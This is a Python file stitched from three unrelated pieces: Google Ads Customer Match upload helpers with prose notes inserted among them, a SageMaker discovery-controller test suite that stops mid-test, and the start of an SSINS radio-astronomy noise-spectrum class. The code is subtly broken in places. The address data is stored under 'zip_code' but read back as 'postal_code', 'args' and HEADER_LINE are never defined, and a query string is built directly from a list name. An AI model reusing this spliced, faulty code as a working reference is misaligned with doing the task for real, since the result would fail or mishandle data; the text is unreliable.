# Default Values
GENERIC_LIST = 'Generic List from the API'
CSV_FILE_PATH = 'audience.csv'
CONFIG_PATH = './googleads_config.yaml'
MEMBERSHIP_LIFESPAN_DAYS = 8
# Constants
CONTACT_INFO = 'CONTACT_INFO'
MOBILE_ADVERTISING_ID = 'MOBILE_ADVERTISING_ID'
CRM_ID = 'CRM_ID'
def generate_list_data_base(list_type):
"""Generates an empty customer list data object.
Args:
list_type: The type of customer list (based on CustomerMatchUploadKeyType).
Returns:
data_base: an empty customer list data object.
"""
data_base = {}
if list_type == CONTACT_INFO:
data_base['emails'] = []
data_base['phones'] = []
data_base['addresses'] = []
elif list_type == MOBILE_ADVERTISING_ID:
data_base['mobile_ids'] = []
elif list_type == CRM_ID:
data_base['user_ids'] = []
return data_base
def is_list_empty(customer_data):
if customer_data:
for item in customer_data:
if customer_data[item]:
return False
return True
def read_csv(path, list_type, hash_required):
"""Reads customer data from CSV and stores it in memory.
Args:
path: CSV file path.
list_type: The type of customer list (based on CustomerMatchUploadKeyType).
hash_required: Indicates if the customer data needs to be hashed.
Returns:
customer_data: Processed data from CSV.
"""
with open(path, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
customer_data = {}
for row in csv_reader:
if HEADER_LINE and line_count == 0:
# csv.DictReader already consumes the header row, so no data row is
# skipped here; only the line counter is advanced.
line_count += 1
if row.get(LIST_NAME):
if not customer_data.get(row[LIST_NAME]):
customer_data[row[LIST_NAME]] = generate_list_data_base(list_type)
list_data = customer_data[row[LIST_NAME]]
else:
# Use generic list
if not customer_data.get(GENERIC_LIST):
customer_data[GENERIC_LIST] = generate_list_data_base(list_type)
list_data = customer_data[GENERIC_LIST]
if list_type == CONTACT_INFO:
if row.get(EMAIL):
if hash_required:
list_data['emails'].append(
{'hashed_email': normalize_and_sha256(row[EMAIL])})
else:
list_data['emails'].append({'hashed_email': row[EMAIL]})
if row.get(PHONE):
if hash_required:
list_data['phones'].append(
{'hashed_phone_number': normalize_and_sha256(row[PHONE])})
else:
list_data['phones'].append({'hashed_phone_number': row[PHONE]})
if (row.get(FIRST_NAME) and row.get(LAST_NAME) and
row.get(COUNTRY_CODE) and row.get(ZIP_CODE)):
address = {}
if hash_required:
address['hashed_first_name'] = normalize_and_sha256(row[FIRST_NAME])
address['hashed_last_name'] = normalize_and_sha256(row[LAST_NAME])
else:
address['hashed_first_name'] = row[FIRST_NAME]
address['hashed_last_name'] = row[LAST_NAME]
address['country_code'] = row[COUNTRY_CODE]
address['zip_code'] = row[ZIP_CODE]
list_data['addresses'].append(address)
elif list_type == MOBILE_ADVERTISING_ID:
if row.get(MOBILE_ID):
list_data['mobile_ids'].append({'mobile_id': row[MOBILE_ID]})
elif list_type == CRM_ID:
if row.get(USER_ID):
list_data['user_ids'].append({'third_party_user_id': row[USER_ID]})
line_count += 1
print(f'Processed {line_count} lines from file {path}.')
return customer_data
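`read_csv` relies on `normalize_and_sha256`, which is defined outside this excerpt. A minimal sketch consistent with how it is used here and with Customer Match's usual formatting rules (trim surrounding whitespace, lowercase, then SHA-256 hex digest) might look like:

```python
import hashlib

def normalize_and_sha256(value):
    """Trims and lowercases a string, then returns its SHA-256 hex digest."""
    normalized = value.strip().lower()
    return hashlib.sha256(normalized.encode('utf-8')).hexdigest()

# Normalization makes the hash insensitive to case and surrounding spaces.
digest = normalize_and_sha256('  User@Example.com ')
print(len(digest))  # 64 hex characters
```

Because matching happens on the hashed values server-side, consistent normalization before hashing is what makes uploaded records comparable with Google's own hashes.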
def get_user_list_resource_name(client, customer_id, list_name):
"""Gets the User List using the name provided.
Args:
client: The Google Ads client instance.
customer_id: The customer ID for which to add the user list.
list_name: The name of the user list to search.
Returns:
The User List resource name.
"""
googleads_service_client = client.get_service('GoogleAdsService')
query = f'''
SELECT
user_list.id,
user_list.name
FROM user_list
WHERE user_list.name = '{list_name}'
'''
search_results = googleads_service_client.search(
customer_id=customer_id, query=query)
user_list_resource_name = None
for result in search_results:
user_list_resource_name = result.user_list.resource_name
return user_list_resource_name
def create_user_list(client, customer_id, list_name, list_type, app_id=None):
"""Creates a User List using the name provided.
Args:
client: The Google Ads client instance.
customer_id: The customer ID for which to add the user list.
list_name: The name of the user list to search.
list_type: The type of customer list (based on CustomerMatchUploadKeyType).
app_id: App ID required only for mobile advertising lists.
Returns:
The User List resource name.
"""
print(f'The user list {list_name} will be created.')
user_list_service_client = client.get_service('UserListService')
user_list_operation = client.get_type('UserListOperation')
# Creates the new user list.
user_list = user_list_operation.create
user_list.name = list_name
user_list.description = ('This is a list of users uploaded using Ads API.')
user_list.crm_based_user_list.upload_key_type = (list_type)
if list_type == MOBILE_ADVERTISING_ID:
user_list.crm_based_user_list.app_id = app_id
user_list.membership_life_span = MEMBERSHIP_LIFESPAN_DAYS
response = user_list_service_client.mutate_user_lists(
customer_id=customer_id, operations=[user_list_operation])
user_list_resource_name = response.results[0].resource_name
print(
f'User list with resource name "{user_list_resource_name}" was created.')
return user_list_resource_name
def add_users_to_customer_match_user_list(client, customer_id,
user_list_resource_name,
customer_data, skip_polling):
"""Uses Customer Match to create and add users to a new user list.
Args:
client: The Google Ads client.
customer_id: The customer ID for which to add the user list.
user_list_resource_name: The resource name of the user list to which to
add users.
customer_data: Processed customer data to be uploaded.
skip_polling: A bool dictating whether to poll the API for completion.
"""
offline_user_data_job_service_client = client.get_service(
'OfflineUserDataJobService')
offline_user_data_job = client.get_type('OfflineUserDataJob')
offline_user_data_job.type_ = client.get_type(
'OfflineUserDataJobTypeEnum'
).OfflineUserDataJobType.CUSTOMER_MATCH_USER_LIST
offline_user_data_job.customer_match_user_list_metadata.user_list = (
user_list_resource_name)
# Issues a request to create an offline user data job.
create_offline_user_data_job_response = (
offline_user_data_job_service_client.create_offline_user_data_job(
customer_id=customer_id, job=offline_user_data_job))
offline_user_data_job_resource_name = (
create_offline_user_data_job_response.resource_name)
print('Created an offline user data job with resource name: '
f'"{offline_user_data_job_resource_name}".')
request = client.get_type('AddOfflineUserDataJobOperationsRequest')
request.resource_name = offline_user_data_job_resource_name
request.operations = build_offline_user_data_job_operations(
client, customer_data)
request.enable_partial_failure = True
# Issues a request to add the operations to the offline user data job.
response = offline_user_data_job_service_client.add_offline_user_data_job_operations(
request=request)
# Prints the status message if any partial failure error is returned.
# Note: the details of each partial failure error are not printed here.
# Refer to the error_handling/handle_partial_failure.py example to learn
# more.
# Extracts the partial failure from the response status.
partial_failure = getattr(response, 'partial_failure_error', None)
if getattr(partial_failure, 'code', None) != 0:
error_details = getattr(partial_failure, 'details', [])
for error_detail in error_details:
failure_message = client.get_type('GoogleAdsFailure')
# Retrieve the class definition of the GoogleAdsFailure instance
# in order to use the "deserialize" class method to parse the
# error_detail string into a protobuf message object.
failure_object = type(failure_message).deserialize(error_detail.value)
for error in failure_object.errors:
print('A partial failure at index '
f'{error.location.field_path_elements[0].index} occurred.\n'
f'Error message: {error.message}\n'
f'Error code: {error.error_code}')
print('The operations are added to the offline user data job.')
# Issues a request to run the offline user data job for executing all
# added operations.
operation_response = (
offline_user_data_job_service_client.run_offline_user_data_job(
resource_name=offline_user_data_job_resource_name))
if skip_polling:
check_job_status(
client,
customer_id,
offline_user_data_job_resource_name,
user_list_resource_name,
)
else:
# Wait until the operation has finished.
print('Request to execute the added operations started.')
print('Waiting until operation completes...')
operation_response.result()
print_customer_match_user_list_info(client, customer_id,
user_list_resource_name)
def build_offline_user_data_job_operations(client, customer_data):
"""Builds the schema of user data as defined in the API.
Args:
client: The Google Ads client.
customer_data: Processed customer data to be uploaded.
Returns:
A list containing the operations.
"""
customer_data_operations = []
for data_type in customer_data:
for item in customer_data[data_type]:
# Creates a first user data based on an email address.
user_data_operation = client.get_type('OfflineUserDataJobOperation')
user_data = user_data_operation.create
user_identifier = client.get_type('UserIdentifier')
if data_type == 'emails':
user_identifier.hashed_email = item['hashed_email']
elif data_type == 'phones':
user_identifier.hashed_phone_number = item['hashed_phone_number']
elif data_type == 'mobile_ids':
user_identifier.mobile_id = item['mobile_id']
elif data_type == 'user_ids':
user_identifier.third_party_user_id = item['third_party_user_id']
elif data_type == 'addresses':
user_identifier.address_info.hashed_first_name = item[
'hashed_first_name']
user_identifier.address_info.hashed_last_name = item['hashed_last_name']
user_identifier.address_info.country_code = item['country_code']
user_identifier.address_info.postal_code = item['postal_code']
user_data.user_identifiers.append(user_identifier)
customer_data_operations.append(user_data_operation)
return customer_data_operations
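For reference, the customer_data mapping that build_offline_user_data_job_operations iterates over has one key per identifier type. A sketch of its expected shape; the angle-bracket values are placeholders, not real identifiers:

```python
# Placeholder sketch of the structure consumed by the builder above.
customer_data = {
    'emails': [{'hashed_email': '<sha256 of normalized email>'}],
    'phones': [{'hashed_phone_number': '<sha256 of normalized phone>'}],
    'mobile_ids': [{'mobile_id': '<mobile advertising id>'}],
    'user_ids': [{'third_party_user_id': '<crm user id>'}],
    'addresses': [{
        'hashed_first_name': '<sha256 of first name>',
        'hashed_last_name': '<sha256 of last name>',
        'country_code': 'US',
        'postal_code': '94043',
    }],
}
```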
def check_job_status(
client,
customer_id,
offline_user_data_job_resource_name,
user_list_resource_name,
):
"""Retrieves, checks, and prints the status of the offline user data job.
Args:
client: The Google Ads client.
customer_id: The customer ID for which to add the user list.
offline_user_data_job_resource_name: The resource name of the offline
user data job to get the status of.
user_list_resource_name: The resource name of the customer match user
list
"""
query = f'''
SELECT
offline_user_data_job.resource_name,
offline_user_data_job.id,
offline_user_data_job.status,
offline_user_data_job.type,
offline_user_data_job.failure_reason
FROM offline_user_data_job
WHERE offline_user_data_job.resource_name =
'{offline_user_data_job_resource_name}'
LIMIT 1'''
# Issues a search request using streaming.
google_ads_service = client.get_service('GoogleAdsService')
results = google_ads_service.search(customer_id=customer_id, query=query)
offline_user_data_job = next(iter(results)).offline_user_data_job
status_name = offline_user_data_job.status.name
print(f'Offline user data job ID \'{offline_user_data_job.id}\' with type '
f'\'{offline_user_data_job.type_.name}\' has status: {status_name}')
if status_name == 'SUCCESS':
print_customer_match_user_list_info(client, customer_id,
user_list_resource_name)
elif status_name == 'FAILED':
print(f'\tFailure Reason: {offline_user_data_job.failure_reason}')
elif status_name in ('PENDING', 'RUNNING'):
print('To check the status of the job periodically, use the following '
f'GAQL query with GoogleAdsService.Search: {query}')
print('Or you can use the check_job.py script with the following args:')
print(f'\npython check_job.py --config_file {args.config_file} '
f'--customer_id {customer_id} '
f'--job_resource_name {offline_user_data_job_resource_name}')
#!/usr/bin/env python3
#
# Copyright 2020 IBM
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# coding: utf-8
from __future__ import absolute_import
import unittest
from datetime import datetime
from unittest import mock
import botocore
from swagger_server.controllers.discover_controller import list_endpoints, list_models, get_endpoint_by_id, get_model_by_id
from swagger_server.models.error import Error # noqa: E501
from swagger_server.models.endpoints import Endpoints
from swagger_server.models.endpoint import Endpoint
from swagger_server.models.models import Models
from swagger_server.models.model import Model
from swagger_server.test import BaseTestCase
class TestDiscoverController(BaseTestCase, unittest.TestCase):
"""DiscoverController integration test stubs"""
# GET ENDPOINT BY ID
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_endpoint_by_id(self, mock_boto_client, mock_list_endpoints):
"""Test case for get_endpoint_by_id
Get an Endpoint
"""
endpoint_id = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.describe_endpoint.return_value = {
'EndpointName': 'string',
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_list_endpoints.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': 'string',
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'deployed_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'FakeEndpointId',\n" +
" 'links': [{'href': 'http://localhost/endpoints/FakeEndpointId', 'rel': 'self'},\n" +
" {'href': 'http://localhost/models/string', 'rel': 'model'}],\n" +
" 'name': 'FakeEndpointId',\n" +
" 'status': 'in_service'}")
response = get_endpoint_by_id(endpoint_id)
assert isinstance(response, Endpoint)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_endpoint_by_id_client_error(self, mock_boto_client, mock_list_endpoints):
"""Test case for get_endpoint_by_id
Get an Endpoint
"""
endpoint_id = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.describe_endpoint.side_effect = botocore.exceptions.ClientError(
error_response={'Error': {'Code': 'ErrorCode'}},
operation_name='describe_endpoint'
)
expected = ("{'error': 'An error occurred (ErrorCode) when calling the describe_endpoint '\n" +
" 'operation: Unknown'}")
response = get_endpoint_by_id(endpoint_id)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_endpoint_by_id_unknown_error(self, mock_boto_client, mock_list_endpoints):
"""Test case for get_endpoint_by_id
Get an Endpoint
"""
endpoint_id = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.describe_endpoint.side_effect = {
'error': 'error message'
}
expected = "{'error': \"<class 'TypeError'>\"}"
response = get_endpoint_by_id(endpoint_id)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
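The error-path tests above drive behavior through unittest.mock side_effect. A minimal stdlib-only sketch of the two mechanisms used (an exception side_effect makes the call raise; an iterable yields successive return values); the names here are illustrative:

```python
from unittest import mock

client = mock.Mock()

# An exception side_effect makes the mocked call raise.
client.describe_endpoint.side_effect = RuntimeError('boom')
try:
    client.describe_endpoint()
    caught = None
except RuntimeError as err:
    caught = str(err)

# An iterable side_effect returns the next element on each call.
client.list_endpoints.side_effect = [{'Endpoints': []}, {'Endpoints': ['e1']}]
first = client.list_endpoints()
second = client.list_endpoints()
```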
# GET MODEL BY ID
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_model_by_id(self, mock_boto_client, mock_client):
"""Test case for get_model_by_id
Get a Model
"""
modelId = 'FakeModelId'
endpointId = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_client.return_value.describe_model.return_value = {
'ModelName': modelId,
'ModelArn': 'string',
'CreationTime': datetime(2015, 1, 1)
}
mock_client.return_value.list_endpoints.return_value = {
'Endpoints': [
{
'EndpointName': endpointId,
'EndpointArn': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1),
'EndpointStatus': 'InService'
}
],
'NextToken': 'string'
}
mock_client.return_value.describe_endpoint.return_value = {
'EndpointName': endpointId,
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_client.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': modelId,
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'created_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'FakeModelId',\n" +
" 'input_schema': None,\n" +
" 'links': [{'href': 'http://localhost/models/FakeModelId', 'rel': 'self'},\n" +
" {'href': 'http://localhost/endpoints/FakeEndpointId',\n" +
" 'rel': 'endpoint'}],\n" +
" 'metadata': None,\n" +
" 'modified_at': None,\n" +
" 'name': 'FakeModelId',\n" +
" 'output_schema': None,\n" +
" 'version': None}")
response = get_model_by_id(modelId)
assert isinstance(response, Model)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_client.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_model_by_id_client_error(self, mock_boto_client, mock_list_models):
"""Test case for get_model_by_id
Get a Model
"""
modelId = 'FakeModelId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_models.return_value.describe_model.side_effect = botocore.exceptions.ClientError(
error_response={'Error': {'Code': 'ErrorCode'}},
operation_name='describe_model'
)
expected = ("{'error': 'An error occurred (ErrorCode) when calling the describe_model '\n" +
" 'operation: Unknown'}")
response = get_model_by_id(modelId)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_models.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_model_by_id_unknown_error(self, mock_boto_client, mock_list_models):
"""Test case for get_model_by_id
Get a Model
"""
modelId = 'FakeModelId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_models.return_value.describe_model.side_effect = {
'error': 'error message'
}
expected = "{'error': \"<class 'TypeError'>\"}"
response = get_model_by_id(modelId)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_models.assert_called_once()
# LIST ENDPOINTS
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_list_endpoints(self, mock_boto_client, mock_list_endpoints):
"""Test case for list_endpoints
List Endpoints
"""
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.list_endpoints.return_value = {
'Endpoints': [
{
'EndpointName': 'string',
'EndpointArn': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1),
'EndpointStatus': 'InService'
},
],
'NextToken': 'string'
}
mock_list_endpoints.return_value.describe_endpoint.return_value = {
'EndpointName': 'string',
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_list_endpoints.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': 'string',
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'endpoints': [{'deployed_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'string',\n" +
" 'links': [{'href': 'http://localhost/endpoints/string',\n" +
" 'rel': 'self'},\n" +
" {'href': 'http://localhost/models/string',\n" +
" 'rel': 'model'}],\n" +
" 'name': 'string',\n" +
" 'status': 'in_service'}]}")
response = list_endpoints()
assert isinstance(response, Endpoints)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_list_endpoints_with_model_id(self, mock_boto_client, mock_list_endpoints):
"""Test case for list_endpoints
List Endpoints
"""
modelId = 'FakeModelId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.list_endpoints.return_value = {
'Endpoints': [
{
'EndpointName': 'string',
'EndpointArn': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1),
'EndpointStatus': 'InService'
},
],
'NextToken': 'string'
}
mock_list_endpoints.return_value.describe_endpoint.return_value = {
'EndpointName': 'string',
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_list_endpoints.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': modelId,
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'endpoints': [{'deployed_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'string',\n" +
" 'links': [{'href': 'http://localhost/endpoints/string',\n" +
" 'rel': 'self'},\n" +
" {'href': 'http://localhost/models/FakeModelId',\n" +
" 'rel': 'model'}],\n" +
" 'name': 'string',\n" +
" 'status': 'in_service'}]}")
response = list_endpoints(modelId)
assert isinstance(response, Endpoints)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_list_endpoints_not_existing_model_id(self, mock_boto_client, mock_list_endpoints):
"""Test case for list_endpoints
List Endpoints
"""
modelId = 'FakeModelId'
# SSINS/incoherent_noise_spectrum.py
"""
The incoherent noise spectrum class.
"""
import numpy as np
import os
from pyuvdata import UVFlag
import yaml
from functools import reduce
import warnings
from itertools import combinations
from SSINS.match_filter import Event
class INS(UVFlag):
"""
Defines the incoherent noise spectrum (INS) class, which is a subclass of
the UVFlag class, a member of the pyuvdata software package.
"""
def __init__(self, input, history='', label='', order=0, mask_file=None,
match_events_file=None, spectrum_type="cross",
use_integration_weights=False, nsample_default=1):
"""
init function for the INS class.
Args:
input: See UVFlag documentation
history: See UVFlag documentation
label: See UVFlag documentation
order: Sets the order parameter for the INS object
mask_file: A path to an .h5 (UVFlag) file that contains a mask for the metric_array
match_events_file: A path to a .yml file that has events caught by the match filter
spectrum_type: Type of visibilities to use in making the spectrum. Options are 'auto' or 'cross'.
use_integration_weights: Whether to use the integration time and nsample array to compute the weights
nsample_default: The default nsample value to fill zeros in the
nsample_array with when there are some nsample=0. Important when
working with data from uvfits files, which combine information
from the flag_array and nsample_array in the weights field of
the uvfits file.
"""
super().__init__(input, mode='metric', copy_flags=False,
waterfall=False, history='', label='')
# Used in _data_params to determine when not to return None
self._super_complete = True
if np.any(self.polarization_array > 0):
raise ValueError("SS input has pseudo-Stokes data. SSINS does not"
" currently support pseudo-Stokes spectra.")
self.spectrum_type = spectrum_type
"""The type of visibilities the spectrum was made from."""
if self.spectrum_type not in ['cross', 'auto']:
raise ValueError("Requested spectrum_type is invalid. Choose 'cross' or 'auto'.")
spec_type_str = f"Initialized spectrum_type:{self.spectrum_type} from visibility data. "
self.order = order
"""The order of polynomial fit for each frequency channel during mean-subtraction. Default is 0, which just calculates the mean."""
if self.type == 'baseline':
self.history += spec_type_str
# Check if the data has a mask yet. If not, mask it and set flag_choice to None.
if not isinstance(input.data_array, np.ma.MaskedArray):
input.apply_flags()
self.metric_array = np.abs(input.data_array)
"""The baseline-averaged sky-subtracted visibility amplitudes (numpy masked array)"""
self.weights_array = np.logical_not(input.data_array.mask).astype(float)
"""The number of baselines that contributed to each element of the metric_array"""
if use_integration_weights:
# Set nsample default if some are zero
input.nsample_array[input.nsample_array == 0] = nsample_default
# broadcast problems with single pol
self.weights_array *= (input.integration_time[:, np.newaxis, np.newaxis, np.newaxis] * input.nsample_array)
cross_bool = self.ant_1_array != self.ant_2_array
auto_bool = self.ant_1_array == self.ant_2_array
if self.spectrum_type == "cross":
has_crosses = np.any(cross_bool)
if not has_crosses:
raise ValueError("Requested spectrum type is 'cross', but no cross"
" correlations exist. Check SS input.")
has_autos = np.any(auto_bool)
if has_autos:
warnings.warn("Requested spectrum type is 'cross'. Removing autos before averaging.")
self.select(ant_str="cross")
elif self.spectrum_type == "auto":
has_autos = np.any(auto_bool)
if not has_autos:
raise ValueError("Requested spectrum type is 'auto', but no autos"
" exist. Check SS input.")
has_crosses = np.any(cross_bool)
if has_crosses:
warnings.warn("Requested spectrum type is 'auto'. Removing"
" crosses before averaging.")
self.select(ant_str="auto")
super().to_waterfall(method='mean', return_weights_square=True)
# Make sure the right type of spectrum is being used, otherwise raise errors.
# If neither statement inside is true, then it is an old spectrum and is therefore a cross-only spectrum.
elif spec_type_str not in self.history:
if "Initialized spectrum_type:" in self.history:
raise ValueError("Requested spectrum type disagrees with saved spectrum. "
"Make opposite choice on initialization.")
elif self.spectrum_type == "auto":
raise ValueError("Reading in a 'cross' spectrum as 'auto'. Check"
" spectrum_type for INS initialization.")
if not hasattr(self.metric_array, 'mask'):
self.metric_array = np.ma.masked_array(self.metric_array)
if mask_file is None:
# Only mask elements initially if no baselines contributed
self.metric_array.mask = self.weights_array == 0
else:
# Read in the flag array
flag_uvf = UVFlag(mask_file)
self.metric_array.mask = np.copy(flag_uvf.flag_array)
del flag_uvf
if match_events_file is None:
self.match_events = []
"""A list of tuples that contain information about events caught during match filtering"""
else:
self.match_events = self.match_events_read(match_events_file)
# For backwards compatibility, from before weights_square_array existed.
# Works because weights are all 1 or 0 before this feature was added
if self.weights_square_array is None:
self.weights_square_array = np.copy(self.weights_array)
self.metric_ms = self.mean_subtract()
